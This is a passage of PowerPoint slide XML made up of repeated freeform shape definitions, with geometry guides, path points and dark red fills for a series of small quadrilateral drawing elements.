                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 39"/>
                <a:gd name="T16" fmla="*/ 0 h 56"/>
                <a:gd name="T17" fmla="*/ 39 w 39"/>
                <a:gd name="T18" fmla="*/ 56 h 56"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="39" h="56">
                  <a:moveTo>
                    <a:pt x="39" y="25"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="39" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39" y="25"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10572" name="Freeform 621"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2643" y="3108"/>
              <a:ext cx="33" cy="51"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 33"/>
                <a:gd name="T1" fmla="*/ 21 h 51"/>
                <a:gd name="T2" fmla="*/ 33 w 33"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 33"/>
                <a:gd name="T5" fmla="*/ 29 h 51"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 21 h 51"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 33"/>
                <a:gd name="T16" fmla="*/ 0 h 51"/>
                <a:gd name="T17" fmla="*/ 33 w 33"/>
                <a:gd name="T18" fmla="*/ 51 h 51"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="33" h="51">
                  <a:moveTo>
                    <a:pt x="33" y="21"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="21"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10573" name="Freeform 622"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2607" y="3084"/>
              <a:ext cx="34" cy="50"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 22 h 50"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 27 h 50"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 22 h 50"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 50"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 50 h 50"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="50">
                  <a:moveTo>
                    <a:pt x="34" y="22"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="22"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10574" name="Freeform 623"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3126"/>
              <a:ext cx="30" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 30 w 30"/>
                <a:gd name="T1" fmla="*/ 24 h 49"/>
                <a:gd name="T2" fmla="*/ 30 w 30"/>
                <a:gd name="T3" fmla="*/ 49 h 49"/>
                <a:gd name="T4" fmla="*/ 0 w 30"/>
                <a:gd name="T5" fmla="*/ 27 h 49"/>
                <a:gd name="T6" fmla="*/ 0 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 49"/>
                <a:gd name="T8" fmla="*/ 30 w 30"/>
                <a:gd name="T9" fmla="*/ 24 h 49"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 30"/>
                <a:gd name="T16" fmla="*/ 0 h 49"/>
                <a:gd name="T17" fmla="*/ 30 w 30"/>
                <a:gd name="T18" fmla="*/ 49 h 49"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="30" h="49">
                  <a:moveTo>
                    <a:pt x="30" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="30" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="24"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10575" name="Freeform 624"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2643" y="3176"/>
              <a:ext cx="33" cy="54"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 33 w 33"/>
                <a:gd name="T1" fmla="*/ 24 h 54"/>
                <a:gd name="T2" fmla="*/ 33 w 33"/>
                <a:gd name="T3" fmla="*/ 54 h 54"/>
                <a:gd name="T4" fmla="*/ 0 w 33"/>
                <a:gd name="T5" fmla="*/ 30 h 54"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 54"/>
                <a:gd name="T8" fmla="*/ 33 w 33"/>
                <a:gd name="T9" fmla="*/ 24 h 54"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 33"/>
                <a:gd name="T16" fmla="*/ 0 h 54"/>
                <a:gd name="T17" fmla="*/ 33 w 33"/>
                <a:gd name="T18" fmla="*/ 54 h 54"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="33" h="54">
                  <a:moveTo>
                    <a:pt x="33" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="33" y="54"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="24"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10576" name="Freeform 625"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2607" y="3150"/>
              <a:ext cx="34" cy="53"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 25 h 53"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 53 h 53"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 53"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 53"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 25 h 53"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 53"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 53 h 53"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="53">
                  <a:moveTo>
                    <a:pt x="34" y="25"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="25"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10577" name="Freeform 626"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3191"/>
              <a:ext cx="29" cy="50"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 29"/>
                <a:gd name="T1" fmla="*/ 23 h 50"/>
                <a:gd name="T2" fmla="*/ 29 w 29"/>
                <a:gd name="T3" fmla="*/ 50 h 50"/>
                <a:gd name="T4" fmla="*/ 0 w 29"/>
                <a:gd name="T5" fmla="*/ 26 h 50"/>
                <a:gd name="T6" fmla="*/ 0 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 50"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 23 h 50"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 29"/>
                <a:gd name="T16" fmla="*/ 0 h 50"/>
                <a:gd name="T17" fmla="*/ 29 w 29"/>
                <a:gd name="T18" fmla="*/ 50 h 50"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="29" h="50">
                  <a:moveTo>
                    <a:pt x="29" y="23"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="23"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10578" name="Freeform 627"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2676" y="3271"/>
              <a:ext cx="40" cy="63"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 40 w 40"/>
                <a:gd name="T1" fmla="*/ 33 h 63"/>
                <a:gd name="T2" fmla="*/ 40 w 40"/>
                <a:gd name="T3" fmla="*/ 63 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 40"/>
                <a:gd name="T5" fmla="*/ 32 h 63"/>
                <a:gd name="T6" fmla="*/ 0 w 40"/>
                <a:gd name="T7" fmla="*/ 0 h 63"/>
                <a:gd name="T8" fmla="*/ 40 w 40"/>
                <a:gd name="T9" fmla="*/ 33 h 63"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 40"/>
                <a:gd name="T16" fmla="*/ 0 h 63"/>
                <a:gd name="T17" fmla="*/ 40 w 40"/>
                <a:gd name="T18" fmla="*/ 63 h 63"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="40" h="63">
                  <a:moveTo>
                    <a:pt x="40" y="33"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="40" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="33"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10579" name="Freeform 628"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2642" y="3244"/>
              <a:ext cx="32" cy="58"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 32"/>
                <a:gd name="T1" fmla="*/ 26 h 58"/>
                <a:gd name="T2" fmla="*/ 32 w 32"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 0 w 32"/>
                <a:gd name="T5" fmla="*/ 29 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 32"/>
                <a:gd name="T7" fmla="*/ 0 h 58"/>
                <a:gd name="T8" fmla="*/ 32 w 32"/>
                <a:gd name="T9" fmla="*/ 26 h 58"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 32"/>
                <a:gd name="T16" fmla="*/ 0 h 58"/>
                <a:gd name="T17" fmla="*/ 32 w 32"/>
                <a:gd name="T18" fmla="*/ 58 h 58"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="32" h="58">
                  <a:moveTo>
                    <a:pt x="32" y="26"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="32" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="26"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10580" name="Freeform 629"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2606" y="3215"/>
              <a:ext cx="34" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 28 h 56"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 29 h 56"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 56"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 28 h 56"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 56"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 56 h 56"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="56">
                  <a:moveTo>
                    <a:pt x="34" y="28"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="28"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10581" name="Freeform 630"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3255"/>
              <a:ext cx="29" cy="51"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 29 w 29"/>
                <a:gd name="T1" fmla="*/ 24 h 51"/>
                <a:gd name="T2" fmla="*/ 29 w 29"/>
                <a:gd name="T3" fmla="*/ 51 h 51"/>
                <a:gd name="T4" fmla="*/ 0 w 29"/>
                <a:gd name="T5" fmla="*/ 25 h 51"/>
                <a:gd name="T6" fmla="*/ 0 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 51"/>
                <a:gd name="T8" fmla="*/ 29 w 29"/>
                <a:gd name="T9" fmla="*/ 24 h 51"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 29"/>
                <a:gd name="T16" fmla="*/ 0 h 51"/>
